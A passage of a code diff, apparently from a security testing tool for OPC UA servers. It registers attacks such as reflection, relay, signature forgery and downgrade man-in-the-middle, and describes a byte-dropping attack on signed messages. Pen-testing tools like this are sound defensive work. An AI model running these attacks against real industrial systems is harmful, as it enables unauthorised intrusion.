send signed +# messages with a payload length of one byte. By dropping messages arbitrary byte ranges (except for the final byte) can +# be removed from the payload. +# The effect is this particular attack is the same as client-downgrade, except that the client does not need to accept +# the None security policy for connection security. + +# Requires that the server has an endpoint list that includes a Sign endpoint, and happens to have the right structure +# to allow the right transformation via byterange dropping. +# """.strip() + +# def add_arguments(self, aparser): +# add_mitm_args(aparser) + +# def execute(self, args): +# client_attack(chunkdrop_mitm, getattr(args, 'server-url'), *getattr(args,'[listen-address]:port'), args.reverse_hello, args.persist) -ENABLED_ATTACKS = [ReflectAttack(), RelayAttack()] +ENABLED_ATTACKS = [ + CheckAttack(), + ReflectAttack(), + RelayAttack(), + PathInjectAttack(), + NoAuthAttack(), + DecryptAttack(), + SigForgeAttack(), + DowngradeMitmAttack(), + # ByteDropMitmAttack(), +] def main(): # Create argument parser for each attack type. aparser = ArgumentParser(description=HELP_TEXT, formatter_class=RawDescriptionHelpFormatter) - subparsers = aparser.add_subparsers(metavar='attack', help='attack to test') + subparsers = aparser.add_subparsers(metavar='attack', help='attack to test', required=True) for attack in ENABLED_ATTACKS: sparser = subparsers.add_parser(attack.subcommand, help=attack.short_help, description=attack.long_help) attack.add_arguments(sparser) @@ -195,8 +388,11 @@ def main(): # Parse args and execute attack. args = aparser.parse_args() - args.attack_obj.execute(args) + try: + args.attack_obj.execute(args) + except AttackNotPossible as ex: + print(f'[-] Attack failed: {ex}') if __name__ == '__main__': - main() \ No newline at end of file + main() diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..b170198 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,11 @@ +certifi==2024.2.2 +cffi==1.16.0 +charset-normalizer==3.3.2 +cryptography==42.0.5 +idna==3.7 +pycparser==2.21 +pycryptodome==3.20.0 +pyOpenSSL==24.1.0 +requests==2.31.0 +urllib3==2.2.1 +keepalive-socket==0.0.1